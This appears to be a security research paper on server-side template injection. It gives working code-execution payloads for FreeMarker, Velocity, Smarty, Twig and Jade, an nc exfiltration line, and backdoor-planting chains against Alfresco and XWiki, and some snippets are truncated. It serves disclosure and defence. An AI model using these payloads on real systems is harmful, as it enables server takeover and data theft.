After detecting template injection, the next step is to identify the template engine in use. This step is sometimes as trivial as submitting invalid syntax, as template engines may identify themselves in the resulting error messages. However, this technique fails when error messages are supressed, and isn't well suited for automation. We have instead automated this in Burp Suite using a decision tree of language-specific payloads. Green and red arrows represent 'success' and 'failure' responses respectively. In some cases, a single payload can have multiple distinct success responses - for example, the probe {{7*'7'}} would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.



The first step after finding template injection and identifying the template engine is to read the documentation. The importance of this step should not be underestimated; one of the zeroday exploits to follow was derived purely from studious documentation perusal. Key areas of interest are:
  • 'For Template Authors' sections covering basic syntax.
  • 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
  • Lists of builtin methods, functions, filters, and variables.
  • Lists of extensions/plugins - some may be enabled by default.


Assuming no exploits have presented themselves, the next step is to explore the environment to find out exactly what you have access to. You can expect to find both default objects provided by the template engine, and application-specific objects passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.

If there's no builtin self object you're going to have to bruteforce variable names. I have created a wordlist for this by crawling GitHub for GET/POST variable names used in PHP projects, and publicly released it via SecLists and Burp Intruder's wordlist collection.

Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.


At this point you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.

Exploit Development

I have audited a range of popular template engines to show the exploit methodology in practice, and make a case for the severity of the issue. The findings may appear to show flaws in template engines themselves, but unless an engine markets itself as suitable for user-submitted templates the responsibility for preventing template injection ultimately lies with web application developers.

Sometimes, thirty seconds of documentation perusal is sufficient to gain RCE. For example, exploiting unsandboxed Smarty is as easy as:
{php}echo `id`;{/php}
Mako is similarly easy to exploit:
import os
However, many template engines try to prevent application logic from creeping into templates by restricting their ability to execute arbitrary code. Others explicitly try to restrict and sandbox templates as a security measure to enable safe processing of untrusted input. Between these measures, developing a template backdoor can prove quite a challenging process.


FreeMarker is one of the most popular Java template languages, and the language I've seen exposed to users most frequently. This makes it surprising that the official website explains the dangers of allowing user-supplied templates:
22. Can I allow users to upload templates and what are the security implications?

In general you shouldn't allow that, unless those users are system administrators or other trusted personnel. Consider templates as part of the source code just like *.java files are. If you still want to allow users to upload templates, here are what to consider:
Buried behind some lesser risks like Denial of Service, we find this:
  • The new built-in (Configuration.setNewBuiltinClassResolver, Environment.setNewBuiltinClassResolver): It's used in templates like "com.example.SomeClass"?new(), and is important for FTL libraries that are partially implemented in Java, but shouldn't be needed in normal templates. While new will not instantiate classes that are not TemplateModel-s, FreeMarker contains a TemplateModel class that can be used to create arbitrary Java objects. Other "dangerous" TemplateModel-s can exist in you class-path. Plus, even if a class doesn't implement TemplateModel, its static initialization will be run. To avoid these, you should use a TemplateClassResolver that restricts the accessible classes (possibly based on which template asks for them), such as TemplateClassResolver.ALLOWS_NOTHING_RESOLVER.
This warning is slightly cryptic, but it does suggest that the new builtin may offer a promising avenue of exploitation. Let's have a look at the documentation on new:
This built-in can be a security concern because the template author can create arbitrary Java objects and then use them, as far as they implement TemplateModel. Also the template author can trigger static initialization for classes that don't even implement TemplateModel. [snip] If you are allowing not-so-much-trusted users to upload templates then you should definitely look into this topic.
Are there any useful classes implementing TemplateModel? Let's take a look at the JavaDoc:
One of these class names stands out - Execute.
The details confirm it does what you might expect - takes input and executes it:
public class Execute
implements TemplateMethodModel

Given FreeMarker the ability to execute external commands. Will fork a process, and inline anything that process sends to stdout in the template.
Using it is as easy as:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

uid=119(tomcat7) gid=127(tomcat7) groups=127(tomcat7)
This payload will come in useful later.


Velocity, another popular Java templating language, is trickier to exploit. There is no 'Security Considerations' page to helpfully point out the most dangerous functions, and also no obvious list of default variables. The following screenshot shows the Burp Intruder tool being used to bruteforce variable names, with the variable name on the left in the 'payload' column and the server's output on the right.
The class variable (highlighted) looks particularly promising because it returns a generic Object. Googling it leads us to
ClassTool: tool meant to use Java reflection in templates
default key: $class
One method and one property stand out:
$class.inspect(class/object/string)returns a new ClassTool instance that inspects the specified class or object
$class.typereturns the actual Class being inspected
In other words, we can chain $class.inspect with $class.type to obtain references to arbitrary objects. We can then execute arbitrary shell commands on the target system using Runtime.exec(). This can be confirmed using the following template, designed to cause a noticeable time delay.
$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()
[5 second time delay]
Getting the shell command's output is a bit trickier (this is Java after all):
#foreach($i in [1..$out.available()])



Smarty is one of the most popular PHP template languages, and offers a secure mode for untrusted template execution. This enforces a whitelist of safe PHP functions, so templates can't directly invoke system(). However, it doesn't prevent us from invoking methods on any classes we can obtain a reference to. The documentation reveals that the $smarty builtin variable can be used to access various environment variables, including the location of the current file at $SCRIPT_NAME. Variable name bruteforcing quickly reveals the self object, which is a reference to the current template. There is very little documentation on this, but the code is all on GitHub. The getStreamVariable method is invaluable:
The getStreamVariable method can be used to read any file the server has read+write permission on:



Furthermore, we can call arbitrary static methods. Smarty exposes a range of invaluable static classes, including Smarty_Internal_Write_File, which has the following method:
public function writeFile($_filepath, $_contents, Smarty $smarty)
This function is designed to create and overwrite arbitrary files, so it can easily be used to create a PHP backdoor inside the webroot, granting us near-complete control over the server. There's one catch - the third argument has a Smarty type hint, so it will reject any non-Smarty type inputs. This means that we need to obtain a reference to a Smarty object.
Further code review reveals that the self::clearConfig() method is suitable:
* Deassigns a single or all config variables
* @param  string $varname variable name or null
* @return Smarty_Internal_Data current Smarty_Internal_Data (or Smarty or Smarty_Internal_Template) instance for chaining
public function clearConfig($varname = null)
    return Smarty_Internal_Extension_Config::clearConfig($this, $varname);
The final exploit, designed to overwrite the vulnerable file with a backdoor, looks like:
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}


Twig is another popular PHP templating language. It has restrictions similar to Smarty's secure mode by default, with a couple of significant additional limitations - it isn't possible to call static methods, and the return values from all functions are cast to strings. This means we can't use functions to obtain object references like we did with Smarty's self::clearConfig(). Unlike Smarty, Twig has documented its self object (_self) so we don't need to bruteforce any variable names.

The _self object doesn't contain any useful methods, but does have an env attribute that refers to a Twig_Environment object, which looks more promising. The setCache method on Twig_Environment can be used to change the location Twig tries to load and execute compiled templates (PHP files) from. An obvious attack is therefore to introduce a Remote File Include vulnerability by setting the cache location to a remote server:
However, modern versions of PHP disable inclusion of remote files by default via allow_url_include, so this approach isn't much use.

Further code review reveals a call to the dangerous call_user_func function on line 874, in the getFilter method. Provided we control the arguments to this, it can be used to invoke arbitrary PHP functions.
public function getFilter($name)
        foreach ($this->filterCallbacks as $callback) {
        if (false !== $filter = call_user_func($callback, $name)) {
            return $filter;
    return false;

public function registerUndefinedFilterCallback($callable)
    $this->filterCallbacks[] = $callable;
Executing arbitrary shell commands is thus just a matter of registering exec as a filter callback, then invoking getFilter:

uid=1000(k) gid=1000(k) groups=1000(k),10(wheel)

Twig (Sandboxed)

Twig's sandbox introduces additional restrictions. It disables attribute retrieval and adds a whitelist of functions and method calls, so by default we outright can't call any functions, even methods on a developer-supplied object. Taken at face value, this makes exploitation pretty much impossible. Unfortunately, the source tells a different story:
public function checkMethodAllowed($obj, $method)
  if ($obj instanceof Twig_TemplateInterface || $obj instanceof Twig_Markup) {
        return true;
Thanks to this snippet we can call any method on objects that implement Twig_TemplateInterface, which happens to include _self. The _self object's displayBlock method offers a high-level gadget of sorts:
public function displayBlock($name, array $context, array $blocks = array(), $useBlocks = true)
    $name = (string) $name;
    if ($useBlocks && isset($blocks[$name])) {
        $template = $blocks[$name][0];
        $block = $blocks[$name][1];
    } elseif (isset($this->blocks[$name])) {
        $template = $this->blocks[$name][0];
        $block = $this->blocks[$name][1];
    } else {
        $template = null;
        $block = null;
    if (null !== $template) {
        try {
            $template->$block($context, $blocks);
        } catch (Twig_Error $e) {
The $template->$block($context, $blocks); call can be abused to bypass the function whitelist and call any method on any object the user can obtain a reference to. The following code will invoke the vulnerableMethod method on the userObject object, with no arguments.

This can't be used to exploit the Twig_Environment->getFilter() method used earlier as there is no way to obtain a reference to the Environment object. However, it does mean that we can invoke methods on any objects the developer has passed into the template - the _context object's attributes can be iterated over to see if anything useful is in scope. The XWiki example later illustrates exploiting a developer-provided class.


Jade is a popular Node.js template engine. The website lets users submit templates in a number of languages by design, and is suitable for showing a purely blackbox exploitation process. For a visual depiction of the following steps, please refer to the presentation video (link pending).

First off, confirm template execution:
= 7*7


Locate the self object:
= root

[object global]

Find a way to list object properties and functions:
- var x = root
- for(var prop in x)
    , #{prop}

, ArrayBuffer, Int8Array, Uint8Array, Uint8ClampedArray... global, process, GLOBAL, root

Explore promising objects:
- var x = root.process
- for(var prop in x)
    , #{prop}

, title, version, moduleLoadList... mainModule, setMaxListeners, emit, once

Bypass trivial countermeasures:
- var x = root.process.mainModule
- for(var prop in x)
    , #{prop}

CodePen removed the words below from your Jade because they could be used to do bad things. Please remove them and try again.
- var x = root.process
- x = x.mainModule
- for(var prop in x)
    , #{prop}

, id, exports, parent, filename, loaded, children, paths, load, require, _compile

Locate useful functions:
- var x = root.process
- x = x.mainModule.require
- x('a')

Cannot find module 'a'

- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc 80')

Case Study: Alfresco

Alfresco is a content management system (CMS) aimed at corporate users. Low privilege users can chain a stored XSS vulnerability in the comment system with FreeMarker template injection to gain a shell on the webserver. The FreeMarker payload created earlier can be used directly without any modification, but I've expanded it into a classic backdoor that executes the contents of the query string as a shell command:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex(url.getArgs())}

Low privilege users do not have permission to edit templates, but the stored XSS vulnerability can be used to force an administrator to install our backdoor for us. I injected the following JavaScript to launch this attack:
tok = /Alfresco-CSRFToken=([^;]*)/.exec(document.cookie)[1];
tok = decodeURIComponent(tok)
do_csrf = new XMLHttpRequest();"POST","http://"+document.domain+":8080/share/proxy/alfresco/api/node/workspace​/SpacesStore/59d3cbdc-70cb-419e-a325-759a4c307304/formprocessor",false);
do_csrf.setRequestHeader('Content-Type','application/json; charset=UTF-8');
do_csrf.send('{"prop_cm_name":"folder.get.html.ftl","prop_cm_content":"&lgt;#assign ex=\\"freemarker.template.utility.Execute\\"?new()> ${ ex(url.getArgs())}","prop_cm_description":""}');

The GUID value of templates can change across installations, but it's easily visible to low privilege users via the 'Data Dictionary'. Also, the administrative user is fairly restricted in the actions they can take, unlike other applications where administrators are intentionally granted complete control over the webserver.

Note that according to Alfresco's own documentation, SELinux will do nothing to confine the resulting shell:
If you installed Alfresco using the setup wizard, the script included in the installation disables the Security-Enhanced Linux (SELinux) feature across the system.

Case Study: XWiki Enterprise

XWiki Enterprise is a feature-rich professional wiki. In the default configuration, anonymous users can register accounts on it and edit wiki pages, which can contain embedded Velocity template code. This makes it an excellent target for template injection. However, the generic Velocity payload created earlier will not work, as the $class helper is not available.
XWiki has the following to say about Velocity:
It doesn't require special permissions since it runs in a Sandbox, with access to only a few safe objects, and each API call will check the rights configured in the wiki, forbidding access to resources or actions that the current user shouldn't be allowed to retrieve/perform. Other scripting language require the user that wrote the script to have Programming Rights to execute them, but except this initial precondition, access is granted to all the resources on the server.
Without programming rights, it's impossible to instantiate new objects, except literals and those safely offered by the XWiki APIs. Nevertheless, the XWiki API is powerful enough to allow a wide range of applications to be safely developed, if "the XWiki way" is properly followed.
Programming Rights are not required for viewing a page containing a script requiring Programming Rights, rights are only needed at save time

In other words, XWiki doesn't just support Velocity - it also supports unsandboxed Groovy and Python scripting. However, these are restricted to users with programming rights. This is good to know because it turns privilege escalation into arbitrary code execution. Since we can only use Velocity, we are limited to the XWiki APIs.
The $doc class has some very interesting methods - astute readers may be able to identify an implied vulnerability in the following:

The content author of a wiki page is the user who last edited it. The presence of distinct save and saveAsAuthor methods implies that the save method does not save as the author, but as the person currently viewing the page. In other words, a low privilege user can create a wiki page that, when viewed by a user with programming rights, silently modifies itself and saves the modifications with those rights. To inject the following Python backdoor:
{{python}}from subprocess import check_output
q = request.get('q') or 'true'
q = q.split(' ')
print ''+check_output(q)+''

We just need to wrap it with some code to grab the privileges of a passing administrator:
innocent content
#if( $doc.hasAccessLevel("programming") )
        innocent content
        {{python}}from subprocess import check_output
        q = request.get('q') or 'true'
        q = q.split(' ')
        print ''+check_output(q)+''

As soon as a wiki page with this content is viewed by a user with programming rights, it will backdoor itself. Any user who subsequently views the page can use it to execute arbitrary shell commands:

Although I chose to exploit $, it is far from the only promising API method. Other potentially useful methods include $xwiki.getURLContent(""), $request.getCookie("password").getValue(), and $services.csrf.getToken().

Mitigations - Templating Safely

If user-supplied templates are a business requirement, how should they be implemented? We have already seen that regexes are not an effective defense, and parser-level sandboxes are error prone. The lowest risk approach is to simply use a trivial template engine such as Mustache, or Python's Template. MediaWiki has taken the approach of executing users' code using a sandboxed Lua environment where potentially dangerous modules and functions have been outright removed. This strategy appears to have held up well, given the lack of people compromising Wikipedia. In languages such as Ruby it may be possible to emulate this approach using monkey-patching.

Another, complementary approach is to concede that arbitrary code execution is inevitable and sandbox it inside a locked-down Docker container. Through the use of capability-dropping, read-only filesystems, and kernel hardening it is possible to craft a 'safe' environment that is difficult to escape from.

Issue Status

I do not consider the exploits shown for FreeMarker, Jade, Velocity and unsandboxed Twig to be vulnerabilities in those languages, in the same way that the possibility of SQL injection is not the fault of MYSQL. The following table shows the current status of the vulnerabilities disclosed in this paper.

AlfrescoDisclosure acknowledged, patch in development
XWikiNo fix available - XWiki developers do not have a consensus that this is a bug
Smarty sandboxFixed in 3.1.24
Twig sandboxFixed in 1.20.0


Template Injection is only apparent to auditors who explicitly look for it, and may incorrectly appear to be low severity until resources are invested in assessing the template engine's security posture. This explains why Template Injection has remained relatively unknown up till now, and its prevalence in the wild remains to be determined.

Template engines are server-side sandboxes. As a result, allowing untrusted users to edit templates introduces an array of serious risks, which may or may not be evident in the template system's documentation. Many modern technologies designed to prevent templates from doing harm are currently immature and should not be relied on except as a defense in depth measure. When Template Injection occurs, regardless of whether it was intentional, it is frequently a critical vulnerability that exposes the web application, the underlying webserver, and adjacent network services.

By thoroughly documenting this issue, and releasing automated detection via Burp Suite, we hope to raise awareness of it and significantly reduce its prevalence.